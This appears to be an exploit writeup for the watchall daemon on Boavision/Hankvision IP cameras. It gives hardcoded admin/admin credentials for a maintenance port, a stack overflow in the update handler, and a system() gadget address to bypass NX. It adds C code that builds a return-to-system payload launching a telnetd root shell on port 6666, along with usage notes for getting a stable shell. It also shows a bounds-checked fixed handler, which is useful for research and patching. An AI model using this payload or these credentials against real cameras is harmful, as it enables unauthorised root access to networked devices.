Boavision aka Hankvision watchall exploit
The watchall executable is responsible for starting all the main binaries of the camera. It also opens the "maintenance" (a.k.a. backdoor) port tcp/20203, which allows obtaining information from the camera, restoring the factory configuration, rebooting the camera or upgrading the firmware. All these operations require logging in to the camera over the same "maintenance" port using the hardcoded credentials "admin"/"admin".
Watchall exists in (at least 3) different versions: in two of them it is very easy to get a root shell using only gadgets present in the binary itself. The last one requires gadgets from uClibc.
The exploit is based on a buffer overflow in TransAndUpdateHandle() (0xabec) in the watchall binary. The buffer overflow is due to the unchecked length of the received update package at 0xae78.

The watchall binary is compiled with NX protection. To bypass it, call system() and open a remote shell, it is possible to use the gadget at 0xce20:

```asm
cpy r0,sp
bl system
```
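The following is an added illustration, not the watchall code and not the author's exploit, of the two points above: the overflow pattern (a length field trusted for a copy into a fixed-size stack buffer) beside a bounds-checked version, and why the gadget works: once the epilogue pops the saved lr, sp points just past it, so `cpy r0,sp` (CPY is the pre-UAL spelling of MOV) hands system() whatever follows the return address in the payload. The buffer size, the frame layout, the package framing (4-byte little-endian length, then the body) and the command string are assumptions; 0xce20 is the gadget address the writeup gives, and the binary must be mapped at a fixed address for it to be usable.

```c
/* Added example (not from the watchall binary). Layout, framing and command are assumed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SIM_BUF_SIZE 64u                          /* assumed size of the handler's stack buffer */
#define GADGET_MOV_R0_SP_BL_SYSTEM 0x0000ce20u    /* gadget address quoted in the writeup */

/* Simulated stack frame of the vulnerable handler (assumed layout). The essential
 * facts: the return address lies above the buffer, and after "pop {r11, pc}"
 * sp points at the bytes that follow it, which is what r0 receives. */
struct sim_frame {
    uint8_t  buf[SIM_BUF_SIZE];
    uint32_t saved_r11;        /* one spilled callee-saved register (assumed) */
    uint32_t saved_lr;         /* return address overwritten by the overflow */
    uint8_t  after_ret[64];    /* sp lands here after the epilogue: system()'s argument */
};

/* Assumed package framing: 4-byte little-endian body length, then the body. */
static uint32_t rd_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Vulnerable pattern: the body length is checked against the packet but never
 * against the destination buffer, so the copy runs over the saved registers and
 * the return address. The copy is clamped to the simulated frame only so this
 * demo does not smash its own real stack. Returns the number of bytes copied. */
size_t handle_update_vulnerable(struct sim_frame *fr, const uint8_t *pkt, size_t pkt_len) {
    if (pkt_len < 4) return 0;
    uint32_t n = rd_le32(pkt);
    if (n > pkt_len - 4) return 0;
    size_t take = n < sizeof *fr ? n : sizeof *fr;   /* simulation bound, not a real check */
    memcpy((uint8_t *)fr, pkt + 4, take);            /* buf is at offset 0; overflows past it */
    return take;
}

/* Hardened version: refuse anything the buffer cannot hold before copying. */
int handle_update_fixed(const uint8_t *pkt, size_t pkt_len) {
    uint8_t buf[SIM_BUF_SIZE];
    if (pkt_len < 4) return -1;
    uint32_t n = rd_le32(pkt);
    if (n > pkt_len - 4 || n > sizeof buf) return -1;   /* the missing bound */
    memcpy(buf, pkt + 4, n);
    return (int)n;
}

/* Feed the hardened handler a package with a body_len-byte body; return its verdict. */
int fixed_verdict(size_t body_len) {
    uint8_t pkg[4 + 2 * SIM_BUF_SIZE];
    if (body_len > sizeof pkg - 4) return -2;
    wr_le32(pkg, (uint32_t)body_len);
    memset(pkg + 4, 'B', body_len);
    return handle_update_fixed(pkg, 4 + body_len);
}

/* Lay out the return-to-system payload: filler up to the saved lr, the gadget
 * address, then the NUL-terminated command exactly where sp will point when the
 * gadget runs "cpy r0,sp". Returns the payload length, 0 if it does not fit. */
size_t build_payload(size_t offset_to_lr, uint32_t gadget, const char *cmd,
                     uint8_t *out, size_t out_cap) {
    size_t cmd_len = strlen(cmd) + 1;
    size_t total = offset_to_lr + 4 + cmd_len;
    if (total > out_cap) return 0;
    memset(out, 'A', offset_to_lr);            /* filler: buffer plus spilled registers */
    wr_le32(out + offset_to_lr, gadget);       /* little-endian ARM return address */
    memcpy(out + offset_to_lr + 4, cmd, cmd_len);
    return total;
}

/* Run the chain against the simulated frame; 1 if the frame's return address now
 * holds the gadget and system()'s argument sits right where sp will point. */
int demo(const char *cmd) {
    uint8_t payload[256], pkg[260];
    struct sim_frame fr;
    memset(&fr, 0, sizeof fr);
    size_t plen = build_payload(offsetof(struct sim_frame, saved_lr),
                                GADGET_MOV_R0_SP_BL_SYSTEM, cmd, payload, sizeof payload);
    if (!plen || plen + 4 > sizeof pkg) return 0;
    wr_le32(pkg, (uint32_t)plen);
    memcpy(pkg + 4, payload, plen);
    if (handle_update_fixed(pkg, plen + 4) != -1) return 0;   /* hardened handler refuses it */
    handle_update_vulnerable(&fr, pkg, plen + 4);
    return rd_le32((const uint8_t *)&fr.saved_lr) == GADGET_MOV_R0_SP_BL_SYSTEM &&
           strcmp((const char *)fr.after_ret, cmd) == 0;
}

int main(void) {
    /* Assumed command; the writeup only says the shell listens on tcp/6666. */
    printf("chain lands on gadget with command in r0: %s\n",
           demo("telnetd -l /bin/sh -p 6666") ? "yes" : "no");
    return 0;
}
```

The real offset from the buffer to the saved lr in TransAndUpdateHandle() is not given on this page and must be taken from the disassembly of the specific watchall version; that is also why a payload built for one version crashes another without giving a shell.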
- I deny any responsibility for problems related to the malfunctioning of this software and its use on your hardware, be careful!
- The shell opened on port tcp/6666 could crash, please use the `passwd` command to temporarily change the root password and log in through the telnet port to have a stable shell.
- The exploit crashes the watchall daemon, so when you have finished exploring the camera please restart it through the web interface.
- Using the wrong exploit version crashes watchall without opening a shell and requires a camera reboot before retrying with another one.
Watchall sha1sum | Version | Notes |
---|---|---|
ca4a38bf7c1e49cd12c125ac3d730cfea897c2b0 | 1 | Binary from my camera |
4d70b63a956347a4c39fb43889de4d29005a8bab | 2 | Other version, easily exploitable |
5959ead28bb0aa7134a3763512331871ddd704b2 | 3 | Requires gadgets from uClibc (not implemented at the moment) |